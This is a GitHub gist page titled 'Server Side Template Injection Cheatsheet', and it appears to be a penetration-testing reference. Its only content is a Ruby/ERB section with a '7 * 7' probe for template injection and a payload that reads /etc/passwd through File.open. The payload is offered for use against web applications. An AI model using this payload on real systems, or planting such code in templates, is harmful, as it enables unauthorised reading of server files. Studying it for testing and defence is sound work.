Created
January 23, 2021 18:45
-
-
Save leveled/4e1b85aa50f931ed10dd1754f3b96f84 to your computer and use it in GitHub Desktop.
Server Side Template Injection Cheatsheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Ruby/ERB | |
| <%= 7 * 7 %> | |
| ##Check | |
| <%= File.open(‘/etc/passwd’).read %> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment